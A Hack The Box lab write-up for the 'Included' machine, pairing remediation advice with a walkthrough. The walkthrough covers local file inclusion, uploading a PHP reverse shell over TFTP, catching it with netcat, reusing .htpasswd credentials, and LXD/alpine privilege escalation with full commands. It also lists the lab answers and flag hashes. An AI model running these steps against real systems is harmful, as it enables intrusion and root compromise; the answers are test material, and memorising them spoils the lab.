HacktheBox Write up — Included
Background
This box involves a lot of enumeration, a very important aspect of pen-testing. Knowing what avenues you can take to gain a point of entry is just as important of a skill as any other technical skill. Using all available resources to you is important as well, and remember — Google is your best friend.
Answers to HTB at bottom
Executive Summary
This machine is left with 2 clear vulnerabilities, one being the fact that LFI (local file inclusion) is possible, which is a common attack where a threat actor changes a URL to navigate to a certain webpage in the website’s directory in order to see something they are not meant to see (https://brightsec.com/blog/local-file-inclusion-lfi/), and the other being the fact that TFTP (Trivial File Transfer Protocol) is left enabled on this machine.
For LFI, a simple solution is to redirect browser requests to pages not typically accessible by public visitors. Proper filtering of URI requests is needed here, and this can be done with a few methods.
- Whitelist Files — Make it so only certain file paths are available from a browser, or only pages/paths that external/public viewers should be visiting.
- Offline Storage — Do not store configuration files and other directories that may hold sensitive information on the web server (backups, important tables), store them elsewhere, such as an external database not connected to the web server’s storage.
There are, of course, other methods, but these two will go a long way in preventing this specific attack.
With TFTP, there is one main method of safeguarding we should take: disable it. There are seldom times when TFTP is worth having as a running service on a web server. Seeing as though it has been around since 1981 and runs on the less secure and reliable UDP, rather than TCP, this protocol is outdated and a security risk in most organizations.
TFTP is a simple protocol used for transferring files between computers on a network. It’s called “trivial” because it’s really basic and doesn’t have many features compared to other file transfer protocols like FTP or HTTP. TFTP is often used in situations where you just need to quickly send or receive a file without the complexity of a full-fledged file transfer protocol.
Now that we have a few solutions to these problems, let’s uncover how we figured these out.
Methodology
Enumeration
To begin this box, we will nmap the target IP, as we typically do.
nmap -sV 10.129.95.185
Nmapping, along with using the -sV flag, will show us what ports are running what services, and the -sV flag will show us the service versions running.
From our output, we see one port running a service, port 80. Port 80 is used for HTTP servers, or more commonly known as, websites.
Also of note is the fact that this webpage is being ran by a version of Apache, version 2.4.29. Apache is an open source HTTP server platform.
“The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.”
To enumerate this port, let’s paste the target IP into a web browser. I use firefox.
Seen above is the landing page for this website. It appears to be a company’s website, with some information about the company, as well as a page to contact them.
Also to be noted: when we navigated to this webpage in our browser, the URL changed the following:
From this, we can deduce that the website is built with PHP.
PHP (recursive acronym for PHP: Hypertext Processor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML.
We can also infer that the web server may be vulnerable to a LFI attack, as mentioned earlier, as the ?file=home.php can lead us to assume that the ?file parameter can be modified to navigate to webpages in the server’s directory, like configuration or backup files.
We know that this is a Linux target machine, so we can try to navigate to the /etc/passwd file, which, in a Linux OS, contains important information about users in the system.
/etc/passwd is a plain text-based database that contains information for all user accounts on the system. It is owned by root and has 644 permissions . The file can only be modified by root or users with sudo privileges and readable by all system users.
Let’s change the URL to the following to attempt to navigate to this page:
http://10.129.95.185/?file=/etc/passwd/
Let’s dissect this output.
This first chunk doesn't show us too much, other than some users which we can already assume would be on the system, such as user “root.”
The next chunk shows the same, but when we get to the last line, we see an interesting snippet:
A user “tftp”. This tips us off that the machine could be running a TFTP service, which our nmap scan would not have detected, as it only detects TCP protocols.
To detect UDP protocols, we can include the flag -sU.
After scanning again with this -sU flag, we see an open port 69, the port used for TFTP.
We have found our point of attack.
Using TFTP as an Attack Vector
As of now, we have discovered that the machine seems vulnerable to LFI, and if we can use TFTP to upload a malicious script (such as a reverse shell), then we have the ability to navigate to it in our browser, therefore calling upon and running our malicious script.
Let’s first create our reverse shell.
We know that this is a PHP based website, so we will have to do it in the PHP language.
On our local machine, let’s create a file called “reverse-shell.php.”
We can use Google here to look up a PHP reverse shell.
Github is a great source for these sorts of things.
GitHub is a platform and cloud-based service for software development and version control using Git, allowing developers to store and manage their code. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project.
The very first result pulled up is a github page, https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.
Let’s copy this into our created file, but we cannot forget to change the IP and PORT to our local machine.
We have to remember the port we enter. Port 4444 is what I used, as it is an unused port and easy to remember.
Now that we have our malicious script, we can upload it by starting a TFTP session and using a “put” command to place this file.
We can use the following commands to do so:
tftp 10.129.95.185
put reverse-shell.php
exit
Now, our malicious file has been copied over to the target machine.
Before we call this file to run, we have to start our netcat listener on our local machine, that way the script has something to call back to.
Netcat is a powerful network monitoring tool you can use on both Linux and Windows to keep everything secure. But what about the “listener” part in Netcat listener? Is it a different application? Actually, Netcat listener is just a way to refer to one of Netcat’s features: “listening in” on open ports. The primary function of Netcat is to read and write data using the TCP and UDP protocols, but it can also eavesdrop, as it were, on other applications.
nc -lvnp 4444Now that we have a listener propped up, we can use LFI as a way to access and run this script we have copied.
Back in our browser, let’s modify our URL again, this time to the following:
http://10.129.95.185/?file=/var/lib/tftpboot/reverse-shell.php
We use this file path since we “put” a file onto the machine using TFTP, and by default, this is where files will be stored.
The default root directory where files will be stored is /var/lib/tftpboot. — The official ubuntu website.
This page will not load, as our netcat listener has been hit, so we can check back on it to see what has happened.
In the image, port 1234 was used, but 4444 could have been used as well.
We can see that we have a connection.
This is sort of a meek shell, let’s spawn a more interactive python shell by running the following command:
python3 -c 'import pty;pty.spawn("/bin/bash")'This is one of those good one-liners to remember, as it can be used in python-ready Linux environments to give you a better shell, or to spawn a “TTY” shell.
What does the tty command do? It prints the name of the terminal you're using. TTY stands for "teletypewriter."
Knowing what terminal we are using is helpful when we want to escalate our privileges, since we can know what terminal is what user without having to run “id” or “whoami.”
Lateral Movement
We have access as www-data, a user used by web servers to read and write specific files.
The web server has to be run under a specific user. That user must exist. If it were run under root, then all the files would have to be accessible by root and the user would need to be root to access the files. With root being the owner, a compromised web server would have access to your entire system. By specifying a specific ID a compromised web server would only have full access to its files and not the entire server.
We do not have a ton of access and “power” as this user, but we know that we can check out some of the /var/www/html directories as user www-data, so let’s start there.
This directory holds important files and folders for the webpage to operate, so it is possible that we can uncover some sensitive information by enumerating this directory.
As seen in the image above, we can use la -al to not only list the files and folders in a “long” (-l) format, but also list the hidden files (-a). After doing this, we can see a file named “.htpasswd.”
.htpasswd is a flat-file used to store usernames and password for basic authentication on an Apache HTTP Server. The name of the file is given in the.htaccess configuration, and can be anything although “.htpasswd” is the canonical name. The file name starts with a dot, because most Unix-like operating systems consider any file that begins with dot to be hidden.
Perfect, after running “cat” on this file to concatenate it (basically output the contents in text in our shell), we can see a set of credentials:
mike:Sheffield19This is great news, we now have a set of credentials we can poke around with.
Let’s run the following command to act as user “mike”
su mikeAfter entering his password when prompted, we now have another shell as user “mike.”
We can poke around and navigate to his home directory to find the user flag and run “cat” on that as well.
Privilege Escalation
We can run “id” as mike to see what groups this user is part of.
We see that he is part of a group “lxd” which is a group designated to dealing with LXC containers.
LXC containers are often considered as something in the middle between a chroot and a full fledged virtual machine. The goal of LXC is to create an environment as close as possible to a standard Linux installation but without the need for a separate kernel.
Not necessarily knowing all that much about users in this group, a quick Google search reveals that we can use something called “alpine” to exploit a machine when we have access as a user in this group.
Alpine Linux is a free and open source operating system designed for routers, firewalls, VPNs, VoIP systems, servers, and other embedded devices.
Editor’s note: This is an instance in which Google is a pen-tester’s best friend. Not knowing a technology, service, software, or protocol is never a dead-end. It is impossible to know every service available, but guaranteed someone else knows about it and has likely put something out there for you to discover and use to your advantage.
We found a great article that will help us use this exploit: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.
We will use method two:
All we have to do is follow along the steps outlined in this article, and we should get root access.
On our local machine, we will run the following commands:
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686We also need to prop up an HTTP server on our local machine using a simply python3 command:
python3 -m http.serverThis will allow us to use “wget” on our target machine to “get” files from our local machine.
Let’s now get this file we built/mounted over to our local machine.
wget 10.10.14.8:8000/alpine-v3.13-x86_64-20210218_0139.tar.gzThis will download the file to the target machine, and we can now follow along with the rest of the walk through.
lxc image import ./alpine*.tar.gz --alias myimage
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
We run a simple “id” and see that we are root user. We can now head over to /mnt/root/root/root.txt to get our root flag.
Summary
All in all, this box involved a very simple initial exploit with a not-as-simple privilege escalation exploit. If we were left to our own devices to escalate our privileges to root, we would have had a more difficult time doing so, though by other members of the community sharing their findings, our skill-set improved with theirs. This serves as an important lesson to always look around for possible solutions online when you seem to hit a wall. Often times, an exploit has been found, you just don’t know it yet.
HacktheBox Answers:
QUESTION 1: What service is running on the target machine over UDP?
TFTP
QUESTION 2: What class of vulnerablity is the webpage that is hosted on port 80 vulnerable to? Give the full name, not an acronym.
Local File Inclusion
QUESTION 3: What is the default system folder that TFTP uses to store files?
/var/lib/tftpboot/
QUESTION 4: Which interesting file is located in the web server folder and can be used for Lateral Movement?
.htpasswd
USER FLAG: Submit the flag located in the mike user’s home directory.
a56ef91d70cfbf2cdb8f454c006935a1
QUESTION 5: What is the group that user Mike is a part of and can be exploited for Privilege Escalation?
LXD
QUESTION 6: When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?
alpine
QUESTION 7: What flag do we set to the container so that it has root privileges on the host system?
security.privileged=true
QUESTION 8: If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?
/mnt/root/
ROOT FLAG: Submit the flag located in root’s home directory.
c693d9c7499d9f572ee375d4c14c7bcf
Keywords
Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb included
